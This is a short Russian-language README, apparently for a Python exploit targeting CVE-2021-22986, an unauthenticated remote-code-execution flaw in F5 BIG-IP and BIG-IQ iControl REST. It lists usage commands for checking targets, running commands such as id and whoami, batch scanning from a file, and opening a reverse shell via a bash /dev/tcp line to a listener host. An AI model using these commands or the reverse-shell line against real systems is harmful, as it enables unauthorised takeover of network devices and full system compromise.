
Эксплойт на Python для CVE-2021-22986, позволяющий неаутентифицированный RCE на F5 BIG-IP и BIG-IQ через iControl REST, с выполнением команд, пакетным сканированием и функциями обратной оболочки.
Эта уязвимость позволяет неаутентифицированным злоумышленникам, имеющим сетевой доступ к интерфейсу iControl REST через интерфейс управления BIG-IP и собственные IP-адреса, выполнять произвольные системные команды, создавать или удалять файлы и отключать службы. Эта уязвимость может быть использована только через плоскость управления и не может быть использована через плоскость данных. Эксплуатация может привести к полному компрометации системы. Система BIG-IP в режиме устройства также уязвима.
python3 CVE_2021_22986.py
python3 CVE_2021_22986.py -v true -u https://192.168.174.164
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami
python3 CVE_2021_22986.py -s true -f check.txt
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"
python3 newpoc.py https://192.168.174.164